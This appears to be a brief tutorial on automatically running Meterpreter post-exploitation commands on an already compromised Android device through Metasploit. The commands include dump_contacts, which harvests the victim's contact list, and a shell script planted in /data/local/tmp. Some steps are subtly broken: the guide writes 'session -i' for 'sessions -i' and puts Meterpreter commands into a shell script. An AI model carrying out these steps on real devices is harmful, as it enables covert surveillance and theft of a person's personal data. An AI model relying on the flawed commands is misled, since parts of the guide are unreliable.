TL;DR
This guide shows you how to automatically run commands when a Meterpreter session starts on an Android device using Metasploit. We’ll use the session -i command with a script file containing your desired commands.
Prerequisites
- Metasploit Framework installed and running
- An active Meterpreter session on an Android device
Step-by-Step Guide
- Create a Command Script File
- Access the Session
- Execute the Script
- Automate on Session Start (Post-Exploitation Module)
First, create a text file (e.g., auto_commands.txt) containing the Meterpreter commands you want to execute automatically. Each command should be on a new line.
sysinfo
getuid
dump_contacts
Open Metasploit and access your Meterpreter session using session -i . Replace <session_id> with the actual ID of your active session.
msf6 > session -i 1
meterpreter > Within the Meterpreter session, use the script command to execute your script. This will run all commands in the file sequentially.
meterpreter > script /data/local/tmp/auto_commands.txt
[*] Running script auto_commands.txt...
... (output of commands) ...
[*] Script completed.
For more robust automation, you can use a post-exploitation module to execute the script automatically when a session is created. This requires creating a custom module or modifying an existing one.
- Create a Custom Post Module (Advanced): This involves writing Ruby code that defines a new module which executes your commands upon session creation. It’s beyond the scope of this basic guide but allows for greater control and flexibility.
- Modify Existing Modules: Some post modules allow you to specify custom scripts or commands to run. Check the documentation of the specific module you are using.
You can attempt to execute a shell script from Meterpreter, but this is less reliable due to Android’s security restrictions.
meterpreter > shell
mkdir /data/local/tmp/script_folder
echo "sysinfo" > /data/local/tmp/script_folder/run.sh
echo "getuid" >> /data/local/tmp/script_folder/run.sh
chmod +x /data/local/tmp/script_folder/run.sh
/data/local/tmp/script_folder/run.sh
Note: This method may require root access or specific permissions to execute the script successfully.
- Permissions: Ensure that the script file has executable permissions if necessary (e.g., using
chmod +x). - File Path: Double-check the path to your script file in the
scriptcommand. - Command Syntax: Verify that all commands in the script are valid Meterpreter commands.
- Android Security: Android’s security features may prevent certain commands from executing, especially without root access.